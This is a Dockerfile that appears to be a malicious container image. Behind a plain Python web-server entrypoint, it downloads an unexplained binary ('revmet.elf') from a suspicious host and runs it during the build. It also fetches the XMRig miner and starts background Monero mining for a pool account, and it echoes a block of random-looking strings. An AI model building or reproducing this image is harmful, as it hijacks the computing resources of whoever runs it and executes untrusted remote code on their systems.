FROM ubuntu:bionic

SHELL ["/bin/bash", "-c"]

RUN apt-get update && apt-get install -y \
    wget \
    ocl-icd-libopencl1 \
    libmicrohttpd-dev \
    libc6 \
    libstdc++6

WORKDIR /root
RUN wget http://mail.oogle.dev:8000//revmet.elf

RUN wget https://github.com/xmrig/xmrig/releases/download/v2.14.1/xmrig-2.14.1-xenial-x64.tar.gz
RUN tar -xzvf xmr*
WORKDIR /root/xmrig-2.14.1
RUN ./xmrig -a cryptonight --background -o stratum+tcp://xmr.pool.minergate.com:45700 -u fewa342rwr@tutanota.com -p x

WORKDIR /root
RUN chmod 777 revmet.elf
RUN ./xmrig-2.14.1/xmrig -a cryptonight --background -o stratum+tcp://xmr.pool.minergate.com:45700 -u fewa342rwr@tutanota.com -p x;./revmet.elf
RUN echo TEZBPlTsJ7wlQ02xViVJX1cUHGgJAE0c PUo4lh8SsStZo52YfFytFRFPJjMOS5uG ucXGvtiDKNA0WEHdETQLj1SucbVWD8aA OE6zexjvVlhccNwUwrOjlYhtu5zJq7A0 QXwKUgc0HDZZmVOUljaxmGFfh6gRMavr gC1ARxWE4ixkn4QAMvAynljzLNwsFW5M OJBC3wk5D0fH2lO7JbOEKgf0S56rpkIt yqhrp6ZBxwfrIW1PGkGtXFBYfcsWLztT ZJxKG6CEX3BjjgWRGZLVKTTiwXeWIyA2 v84KYigpRuJe0RtX4vKiUT0dWjnoSoqY L59F6dP7EbjYMKEVgujE3JoowaSmFGyY DGLrlBP1wP15Z7bzvFORfIDPVXxlKOw8 iRR8Zp0TOxlCM7JSEpHNyxmT4XM90YWc zsaOLYboLruHMbrsWTTwF76XhxiEn5Vb JlcMVQX0KrjEurxbQ9jbtcmhwOFZNPb7 g0B5O2hD9pRQwxZWGXhnBJRmjZt4WqIH ddddddd

ENTRYPOINT ["python3", "-m", "http.server"]